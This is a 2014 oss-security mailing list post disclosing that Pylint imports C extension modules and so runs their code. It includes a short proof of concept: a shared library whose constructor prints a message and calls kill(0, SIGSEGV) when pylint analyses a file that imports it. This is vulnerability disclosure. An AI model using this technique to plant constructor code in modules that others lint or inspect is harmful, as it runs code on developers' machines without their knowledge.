[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20140929123221.GA4178@jwilk.net>
Date: Mon, 29 Sep 2014 14:32:21 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Pylint checks not as static as one would think
Pylint[0] is advertised as "a static code checker, meaning it can
analyse your code without actually running it"[1] and that it "does
not import live modules"[1].
This is, unfortunately, far from reality. Here's a PoC:
$ cat moo.py
from _moo import *
$ cat moo.c
#include <stdio.h>
#include <signal.h>
void __attribute__((constructor)) moo() {
printf("moo!\n");
kill(0, SIGSEGV);
}
$ gcc -Wall -shared -fPIC moo.c -o _moo.so
$ pylint moo.py
No config file found, using default configuration
moo!
Segmentation fault
My understanding is that upstream Pylint maintainers consider this
behavior intentional[2]. But even then, I think it's a serious
documentation flaw.
Should a CVE ID be assigned to this bug? If yes, it should be a
CVE-2010-XXXX.
[0] http://www.pylint.org/
[1] http://docs.pylint.org/faq.html#about-pylint
[2] https://bugs.debian.org/591676#28
--
Jakub Wilk
Powered by blists - more mailing lists
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Confused about mailing lists and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages.
